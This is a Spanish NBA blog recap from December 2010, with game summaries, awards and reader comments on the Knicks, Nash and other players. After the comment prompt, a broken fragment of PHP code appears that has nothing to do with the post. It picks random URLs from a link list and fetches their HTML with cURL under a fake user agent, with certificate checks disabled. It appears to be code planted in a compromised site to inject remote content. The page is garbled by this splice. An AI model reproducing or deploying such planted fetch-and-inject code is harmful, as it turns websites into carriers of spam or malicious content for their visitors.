La Crónica (5/12/2010)

06 de December de 2010 por TheDeerHunter

Los líderes de ambas conferencias se mantienen con paso firme, casi tiránico. Los Spurs, sin apenas despeinarse, se merendaron a los Hornets, que desde el traspaso con Toronto lo han perdido casi todo. Los Celtics lo tuvieron aún más fácil contra unos Nets inoperantes y eso que no contaban con Rondo pero sí con Nate Robinson que lo suplió a las mil maravillas.

Mientras, hay varios equipos que se encuentran en la cresta de la ola. Los Knicks, de la mano de Amaré Stoudemire y una configuración atípica conjuntando a Gallinari y Chandler están que se salen. Anoche dieron buena cuenta de unos Raptors peleones, con Bayless empezando a hacer diabluras en Canadá. Otro expediente-X para que se lo hagan mirar tanto Portland como Hornets (y más ahora).

John Wall debería haber pagado por la lección magistral que se llevó de Phoenix por parte de un jovencito llamado Steve Nash. Nada menos que 17 asistencias y 20 puntos sin fallo del crack canadiense.

Por su parte, los Nuggets sufrieron para asegurar la 7ª victoria consecutiva y la nº 999 de George Karl contra unos Grizzlies peleones. Melo y Billups estuvieron lamentables, pero Nené y Afflalo cuajaron su partido del año para resistir el empuje rival. Hemos hablado poco de él pero Xavier Henry es otro de los que tienen buena pinta de entre los rookies.

Volvió Durant oportunamente en Oklahoma. Sin él difícilmente hubieran doblegado a unos Warriors donde Ellis y Curry volvieron literalmente majara a la defensa de Scott Brooks. Partidazo también de Ibaka y no tanto de Westbrook que estuvo negado en el tiro.

En el resto de los partidos los Blazers rompieron su mala racha ante los Clippers y Detroit hizo lo propio ante los Cavs.

PREMIOS

MVP: No me atrevo a decidirme entre los 27 puntos, 11 rebotes y 6 asistencias de Nené o los 31 puntos, 16 rebotes y 2 asistencias de Stat. Vosotros diréis.

El rookie: Buenas actuaciones tanto de Wall, como de Griffin, de Xavier Henry… pero todos ellos perdieron. Prefiero dárselo a Landry Fields fundamental con 15 puntos, 10 rebotes, 3 asistencias y 3 robos en la victoria de su equipo. Este chico vale tanto para un roto como para un descosido.

La sorpresa: La actuación de Afflalo fue vital para los Nuggets… pero hoy nos apetece destacar la actuación de Nate Robinson con 21 puntos, 6 rebotes y 6 asistencias. Sabemos que es capaz de eso y de mucho más pero lo más loable es su actitud ante su situación de suplente. Uno de los grandes aciertos de los Celtics ha sido involucrarlo en este proyecto tan ambicioso.

La decepción: Entre el 0-6 de Bellinelli, el 0-3 de Marcus Thornton, el 0-2 de David Andersen, el 1-3 de Okafor, 1-5 de Jason Smith, 1-3 de Jarrett Jack… es para desesperarse. Parece mentira que hace un par de semanas nos planteáramos si este equipo era un contendiente.

El mayor esfuerzo en vano: Stephen Curry la armó como sólo los jugones de su calidad saben hacerlo contra la férrea defensa de los Thunder. 39 puntos y 6 asistencias que se van tristemente al pozo de las producciones inútiles.

Comenta

9 comentarios a esta entrada

  1. -=TheKing=- dice:
    #1

    Dios que Nash no se lesione. Hace bueno hasta a Warick.

      Citar

  2. Sancho88 dice:
    #2

    Sin duda, Stat mvp. Una semana en 33-34 puntos de media. Brutal. Está tapando muchas bocas que decían que sin Nash no era nadie, y sin embargo, se está entendiendo a las mil maravillas con Felton. Eso, más el pedazo jugador de equipo que es Landry Fields, y la calidad de Gallinari y Wilson Chandler… muy buena pinta los Knicks de este año. 6 tíos por encima de los diez puntos, incluyendo a Tony Douglas.

      Citar

  3. Scriers dice:
    #3

    Ni que Warrick fuera manco, para mi es un jugador con un aceptable tiro a media distancia y un gran atleta que ademas pone muchos tapones. Quizas pudiera tener mejor vision de juego y mejores movimientos de pivot clasico, pero es muy aprovechable. Aporta mas que Turkoglu, por poner un ejemplo.
    Y en otro orden de cosas, que bien los Nicks, como molan. Espero que les de para playoff

      Citar

  4. Principe de Bel-Air dice:
    #4

    Los cavs a este paso no levantaran nunca cabeza si jamison sique haciendo airballs como ayer, su unica oportunidad para resurgir es trasparlo por un alero decente ya que su juego se basaba en el alero, aunque claro un Alero de la calidad de James me parece que no hay actualmente en la liga.

    P.d 100% de acuerdo con theking, por nash no pasan los años y esos son los verdaderos bases, los que hacen parecer buenos a paquetones como warrick!!

      Citar

  5. LEmontus dice:
    #5

    lo de los tapones de warrick yo no se lo he visto oajalá feura verdad.

    Nash merece que se le recuerde como uno de los mejores en la historia en su puesto.

    Warrick si no primedia 20 puntos es por qué hay partidos enlos que juega 7 min. por que cada vez que pasa de los 20 25 min se va a 20 puntazos. Me gustan los suns.

    También es verdad lo de New york vaya equipazo se han montado con Landri fields y sobre todo el alto rendimiento de un base que para mi no es nada del otro mundo Felton.

      Citar

  6. LEmontus dice:
    #6

    por cierto me gustaría qe troll se pasara por aquí y me dijera que le pasa a los Hornets que tal y como dije acabrán cagándola y acabaran muy abajo

      Citar

  7. Vader dice:
    #7

    Sobre los Cavs me ha parecido interesante el comentario sobre que deberian buscar un alero. Hay rumores que estan intentando el traspaso de A.Iguodala. No es Lebron James pero sin duda tendrian mejor pinta con él.

    Y sobre Felton hay que tener en cuenta que ha estado todos estos años bajo las ordenes de Larry Brown… Desde luego Brown es buen entrenador, pero no se destaca para sacar lo mejor del juego ofensivo de sus jugadores. Seguramente Felton siempre ha tenido estas capacidades ofensivas que estamos viendo este año pero simplemente su entrenador lo le permitia jugar al ritmo que juega a este año y con el descaro que lo esta haciendo. Algo que por supuesto Mike Dantoni le permite y seguramente aplaude.

    Sobre Fields tiene pinta de ser un gran jugador de equipo. Aporta puntos con buenos porcentajes de 2 y 3, rebotea, asiste y pierde muy pocos balones. Todo esto en su año de rookie. De momento el robo del draft sin discusión.

    Saludos

      Citar

  8. alfin dice:
    #8

    muy bien los knicks: STAT la mete de todos los colores, felton ha mejorado todas sus estadisticas, gallinari a su nivel, fields era el numero 38 del draft no digo mas, chandler aportando dedel banquillo, y douglas mozgov y “los otros” aportando de todo.

    se tiene que señalar que los niks han ganado muy pocos partidos con rivales con ranking positivo, pero lucharon contra bulls, celtics, nugets, atlanta o portland. este año playoffs, victoria en el madison frente a lebron y hoy victoria frente a minesota! por cierto SUPERMATE de h.warrik a pase de nash!!!!!!!!

      Citar

  9. Principe de Bel-Air dice:
    #9

    La verdad esque iguodala vendría muy bien a cleveland, claro esta que en el cambio irian o mo williams o jamison. Y si saben lo que les conviene para no volver al hoyo deberian hacer todo lo posible porque fuera el 2do!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>